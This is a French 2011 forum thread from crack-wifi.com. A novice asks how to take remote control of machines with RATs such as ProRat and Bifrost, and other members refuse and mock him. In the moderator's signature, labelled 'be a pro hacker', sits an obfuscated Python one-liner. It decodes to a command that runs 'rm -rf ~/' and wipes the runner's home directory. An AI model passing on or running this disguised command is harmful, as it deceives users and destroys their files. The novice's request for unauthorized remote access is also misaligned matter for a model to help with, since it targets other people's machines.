Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-11-2011 23:04:15

jojoscoottkr
Membre

Aide pour prendre le controle d'une machine distante

bonjour voila 1an que je test le hack aucun resultat

je cherche a prendre le control de machine  soit en wifi de point a point

ou a l'aide des adresse ip "server pro rat"

aucun resultat
seul reussite bt4 en wep ! wpa jamais !

je pense que le probleme vient du hotspot  sfr  "ma connection"

si quelqu'un peut me donné un truc simple et efficace  je suis novice et du fait de ma reussite lol ! je ne suis plus motivé

a l'aide ! svp

bifrost prorat et autres hack cam jamais reussi ! pufff

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-11-2011 23:22:02

koala
Membre d'honneur
Lieu : In the sky

Re : Aide pour prendre le controle d'une machine distante

Salut jojoscoottkr, bon déja le titre de ton topic "aide pour hack" ne veut tout simplement rien dire, un titre plus précis est beaucoup mieux le hacking c'est vaste ensuite ce genre de comportement:

a l'aide ! svp

C'est très ennuyant car c'est pas en nous suppliant que tu auras une réponse plus vite, au contraire je pense.
Le domaine des trojans et autre demande de la patience, de la volonté et de la technique, Veidam un ancien membre pourrait t-en parler surement mieux que moi.

#3 02-11-2011 04:53:36

toto
Membre V.I.P.
Lieu : chez le docteur aussi

oui moi aussi je me souviens de Veidam il avais surtout écrit ceci

Veidam a écrit :

Ce qui est mal c'est de faire des actes malhonnête

tu peut être un script kiddie curieux tant que tu ne nuit pas a autrui en lançant n'importe quoi sur le net parce-que tu maitrise un bout de code...

si tu teste sur virtualbox et que tu le coupe après tu as peu de chance de rejoindre un botnet qui rançonne des sociétés qui sont basé sur le e-commerce

whireshark est l'outil qui te permet de savoir ce qui sort de ton pc et ou il va

je n'utilise pas ce genre de truc sauf pour les décortiquer et je n'aide pas les script kiddie a le faire même si ils ont l'air du bon coté

par contre discuter d'un code c++ qui permet de se greffer a un processus pour ne pas se faire voir par le pare feu et l'uac ça j'aime bien tant que tu ne l'exploite pas ensuite

nos motivations à tous sont diverse mais ce qui fait ou a fait ce forum c'est qu'il n'est animé que de passionnés pas de lamerz les trojans clic and clic c'est pour les truffes maintenant si tes "amis" les plus proches essaie de te faire passer pour ce que tu n'est pas utilise tout les moyens pour te défendre c'est ce que m'a raconté Veidam dans une discussions privé ou j'avais essayer de savoir ou il prenais ses sources en arrivant ici a mes débuts...

Je pense que tu n'est pas sur le bon forum m'enfin je peut me tromper wink

Dernière modification par toto (02-11-2011 04:54:25)

#4 02-11-2011 12:05:02

goliate
Membre Irremplaçable
Site Web

jojoscoottkr a écrit :

bonjour voila 1an que je test le hack aucun resultat

je cherche a prendre le control de machine  soit en wifi de point a point

ou a l'aide des adresse ip "server pro rat"

aucun resultat
seul reussite bt4 en wep ! wpa jamais !

je pense que le probleme vient du hotspot  sfr  "ma connection"

si quelqu'un peut me donné un truc simple et efficace  je suis novice et du fait de ma reussite lol ! je ne suis plus motivé

a l'aide ! svp

bifrost prorat et autres hack cam jamais reussi ! pufff

Salut le kikoolamer (désoler mais vu se que tu demande...).Enfin comme te l'as dit toto, tu as tu te tromper de forum car ici on n'aime pas beaucoup le point and clic.

En ce qui concerne ta demande je doute qu'elle soit légale (ceci explique ma réponse qui peut paraître méchante.)

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#5 04-11-2011 14:06:22

jojoscoottkr
Membre

bonjour,deja c'est pour ma culture personnel et non a autre fin !
je n'ai jamais lancer sur le net puisque jamais reussi a en crée par contre je suis infecter de toute part !
donc j'aimerai deja savoir comment on fait,pour mieux m'en protegé et pourvoir moi aussi faire un coucou moi aussi a ceux qui me pirate. mais bon vu mon niveau je suis loin d'y arrivé !

et j'aimerai aussi pouvoir controlé mes pc a distance par moi meme et non sur des sites "logmein"

en plus je comprend rien a vos lamer,hacker.
desoler mais je m'en fou un peu, je veux juste apprendre le hack sur mes pc,difficulter supplementaire je suis sur hotspot sfr de chaque coté. j'ai deja essayer sur mes pc les "trojan que j'ai fait" rien mais j'ai jamais test sur d'autre personne.
tout le monde n'ai pas mauvais,je comprend pas trop votre comportement "on vient ici" pour avoir de l'aide de personne qui on de bonne base,et comme on est novice on ce fait taper sur la gue....

merci  quand meme !

j'ai relis plusieurs fois mon 1er message je ne vois aucun mal a ma demande d'aide

je prefere pas trop reagir a vos prejugé,sans rien savoir de ma demande je suis jugé coupable hackeur,lameur
ok j'espere pour vous qu'un jour ou l'autre on vous juge aussi et que l'on vous tourne le dos !

merci de votre aide les gars !

#6 04-11-2011 14:38:37

spawn
Modérateur

Un truc simple et efficace pour hacker :

250g de farine
4    œufs
0.5l de lait
1    pincée de sel
50   grammes de beurre
1    sachet de sucre vanillé
1    cuillère à soupe de rhum (5 cl)

Avec ça, après quelques essais, tu réussiras à hacker facilement.

Sinon, histoire d'être productif, tu peux utiliser metasploit (mais ça me fait mal de te dire ça.)

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#7 04-11-2011 16:06:39

koala
Membre d'honneur
Lieu : In the sky

Bon je pense que tout a été dit ici, je ne veux pas que ce topic devienne une source de règlement de compte, je lock donc.

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]